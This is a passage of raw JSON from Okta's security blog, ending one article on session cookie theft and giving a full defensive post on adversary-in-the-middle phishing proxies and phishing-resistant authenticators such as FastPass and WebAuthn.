Chronicle\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Real-Time Phishing Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When writing detections, try to enumerate the legitimate reasons in your environment why user attributes might change mid-session and alert on anything that remains.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Strongly consider updating incident response playbooks to quickly invalidate active sessions any time a malware infection is detected on an endpoint. Given the prevalence of infostealers in commodity malware campaigns – and considering the relatively minor impact to a user when a session is invalidated – we view this as a pragmatic precaution.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators have several tools available for invalidating a session cookie, which in turn invalidates the session. 
They can clear a user’s sessions in the admin console (People > Select Person > More Actions > Clear User Sessions), via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/sessions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/workflows-main.htm#:~:text=Workflows%20is%20an%20interface%2Ddriven,third%2Dparty%20apps%20and%20functions.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta admins can only invalidate IdP sessions and the sessions of third-party app providers that support \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Apps/Apps_Single_Logout.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single Log Out\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as part of their integration with Okta. 
Ask your SaaS providers about APIs or other features that help alert on a change in user context.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - March 8, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - August 9, 2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Article Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-11-05T01:30:04.958Z","secAuthor":[{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"},{"id":"94fa25fb-5f59-5711-92cc-f79d533ee5e2","bio":{"bio":"<p>Tim Peel leads Cyber Threat Research within Okta's cyber defence team. 
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VRUhNsn36rqnvpTCbIgnM/c7b494d1e58fd50e1495da6876a8a450/TP_profile_photo.jpg"},"name":"Tim Peel","jobTitle":"Director, Cyber Threat Research","slug":"tim-peel","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/phishingasaservice","id":"48da25c6-a84e-56a8-9b11-c05714c4742c","title":"Keeping Phishing Adversaries Out of the Middle","date":"2023-05-12T06:41:26+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence frequently observes the use of Adversary-in-the-Middle (AiTM) phishing proxies in high-volume, non-targeted attacks against users of corporate email 
services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Real-time phishing proxies have been used in red team activity and targeted attacks since at least 2017. Microsoft Threat Intelligence Center (MSTIC) \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"observed campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in July 2022 of far higher volume, with 10,000 Microsoft 365 customers targeted in one campaign alone. MSTIC also observed that accounts compromised in these attacks were being abused for Business Email Compromise (payment fraud).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Since February 2023, Okta has observed AiTM campaigns targeting Microsoft 365 at similar, if not higher scale. 
Our visibility into these campaigns comes from customers that federate Microsoft 365 sign-ins to Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This higher frequency is largely driven by the availability of AiTM proxy infrastructure on an “as-a-service” basis by groups like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EvilProxy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloudsek.com/threatintelligence/sophisticated-phishing-toolkit-dubbed-nakedpages-for-sale-on-cybercrime-forums\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NakedPages\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \\\"Phishing as a service\\\" platforms lease access to the infrastructure, configuration, and phishing templates required to operate AiTM campaigns, providing a larger number of threat actors with access to advanced capabilities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is AiTM Phishing?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an adversary-in-the-middle phishing attack, targets are directed to a malicious website that is configured as a reverse proxy server. 
These “real-time” phishing sites relay requests between a targeted user and an impersonated web application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user is tricked into signing in to the legitimate web application via one of these malicious sites, the attacker can access the user’s credentials and the session token returned to the browser.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2d4dHjd8BPMxGrwgNtbi2K\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Users cannot authenticate via attacker-controlled proxies if they use phishing-resistant forms of authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine offers a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"choice of authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that meet the NIST definition for phishing resistance:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (including support for both platform authenticators built into modern devices and roaming authenticators such 
as security keys).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/smart-card-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Smart Cards\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why FastPass is Your Best Bet Against Phishing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators of Okta orgs can enrol users in a broad range of authenticators, each of which offer varied levels of assurance. 
Given the scale at which AiTM campaigns now operate, Okta Verify FastPass stacks up as the most easily deployed and feature-rich defense, given its unique ability to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detect and prevent AitM phishing campaigns and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"surface these events in Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for further investigation and remediation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Collect \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/el-device-attributes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on both managed and unmanaged devices for use in policy evaluation and post-event analysis\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Probe for device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" every time a user requests a new application during a 
session.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Offer a consistent user experience on all OS/browser platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constrain credentials to a single device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s go through each in detail.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Device Assurance  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass is more than just a certificate-based authenticator.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FastPass agent also enables policies that can allow or deny access to resources based on whether a device is managed, and whether a managed device exhibits a secure posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That capability also extends beyond managed devices. FastPass now collects a range of device \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/el-device-attributes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on any device - managed or otherwise - to provide a baseline view of device posture (OS version, jailbreak status etc). This makes FastPass an ideal authenticator for the “extended enterprise\\\". 
Admins can easily provide temporary access to specific apps and data to contractors and partners, without requiring them to sign in from devices the organization manages or controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Continuous Evaluation of Device Context\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Traditionally, device context has been most relevant when evaluated at sign-in. Attacks that abuse a valid session token (typically stolen via infostealer malware or AiTM phishing) can bypass these protections. FastPass offers the opportunity to probe for device context more frequently, enabling workflows that identify and revoke stolen sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Server-side Detection of AiTM Phishing Attempts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While both FIDO2 WebAuthn and Okta Verify FastPass can prevent AiTM phishing, the latter also offers detection opportunities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A failed origin check during an attempt to sign-in using FastPass can be observed server-side. When such an attempt is observed, the Okta service generates a System Log event. This provides security operations teams a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"high-confidence signal\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that users are under attack. 
This \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=_lt-p3tt_zo\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"live demo\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" shows how powerful that is in detection and response scenarios.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why does FastPass offer this detection, but FIDO2 WebAuthn doesn’t? It comes down to the intended design of each authenticator. The designers of FIDO2 WebAuthn optimized for protecting both the security and the privacy of users. This involves trade-offs: some browsers, for example, allow a user to withhold information about an enrolled authenticator to prevent a user being tracked across multiple websites.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The designers of Okta FastPass, on the other hand, optimized for user security, user experience and ease of administration.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Usability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Usability is an overlooked aspect of security. Unfortunately, the authentication experience most users are most familiar with today (passwords, SMS etc) doesn't always offer the highest assurance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once enrolled, Okta FastPass and FIDO2 WebAuthn authenticators offer dramatically improved user experiences over passwords and OTPs. The process of signing in can be up to 50%-75% faster, depending on how many factors are required in policy. 
Okta FastPass can satisfy both a possession (device) and an inherence (biometric) factor in one gesture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, there are subtle differences between the usability of each phishing-resistant authenticator. The experience of WebAuthn varies by browser and by whether the credential was enrolled in single-device or multi-device mode, and much of this nuance isn't obvious to users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass, by contrast, is optimized for a consistent user experience in any browser and on any device (Android, iOS, MacOS and Windows).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Device-Bound Credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a personal or consumer context, PassKeys (discoverable WebAuthn credentials) promise to dramatically accelerate the journey to passwordless authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, multi-device credentials present some interesting challenges in an enterprise context. Where previously a platform-based WebAuthn credential was device-bound, they can now be transferred from a managed device to an unmanaged device using iCloud, AirDrop or alternative services hosted by Google or Microsoft.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This additional attack surface can materially degrade the assurance a credential provides. 
Consider a scenario in which admins enforce phishing resistant authenticators for access to sensitive applications and data: there is no guarantee that a user will apply the same requirement for access to their personal Apple, Google or Microsoft account. The path of least resistance for an attacker may be to phish a user for access to their personal accounts, to then obtain a credential that could potentially be used to unlock access to enterprise apps. So organizations using PassKeys have to accept the residual risk posed by a compromised personal cloud account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass, by contrast, binds credentials to a device. Administrators can also write policies for differentiated levels of access based on whether the credential was hardware-protected (stored in a Trusted Platform Module) versus stored in software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass and WebAuthn offer dramatically higher assurance than alternative forms of authentication. 
Given the lower bar for adversaries to conduct session-stealing phishing campaigns, we recommend enrolment policies that require Okta Verify and WebAuthn, and authentication policies that enforce phishing resistance at every opportunity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1wzkmhJl9IU8I1trYX35uf\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Beyond the immediate risks posed by AiTM phishing, we also recommend taking a holistic approach to managing the risk posed by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hijacked sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply endpoint protection software to protect devices from malware that extracts session cookies from the user’s browser\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with endpoint detection providers to deny authentication requests from devices exhibiting poor security 
hygiene\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set maximum and idle application session duration according to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST guidelines\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set reauthentication frequency to “every time” for access to sensitive applications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny requests from anonymizing proxies, from ASNs with a poor reputation or from locations where you don’t expect users to authenticate from. These requests can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/network/define-asn-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blocked pre-authentication using Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. 
Make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. 
Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - March 8, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session 